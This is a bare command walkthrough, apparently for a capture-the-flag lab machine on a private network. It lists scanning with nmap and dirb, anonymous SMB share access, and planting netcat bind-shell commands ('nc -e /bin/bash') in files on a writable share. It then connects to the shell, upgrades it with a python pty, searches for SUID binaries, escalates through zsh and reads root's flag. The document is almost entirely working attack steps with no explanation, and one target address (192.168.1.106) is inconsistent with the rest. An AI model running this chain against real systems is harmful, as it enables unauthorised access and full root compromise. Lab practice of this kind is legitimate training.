1. -> nmap -sn 192.168.56.0/24


2. -> nmap -sV -A -p- 192.168.56.106


3. -> dirb http://192.168.1.106/


4. -> cd Downloads
   -> cat management.log


5. -> smbclient -L ////192.168.56.106// -N


6. -> smbclient //192.168.56.106/ITDEPT -N


7. -> echo "nc -e /bin/bash -lvp 1234 &" > product-control
   -> echo "nc -e /bin/bash -lvp 1235 &" > web-control
   -> cat product-control
   -> cat web-control


8. Back to SMB shell
   -> put product-control
   -> put web-control
   -> ls


9. Now get this session on your system using netcat 
   -> nc 192.168.56.106 1234
   To get proper shell
   -> python -c 'import pty;pty.spawn("/bin/bash")'


10. -> find / -perm -u=s -type f 2>/dev/null
    -> whoami 
    -> /usr/bin/zsh
    -> whoami
    -> cd /root
    -> cat flag.txt

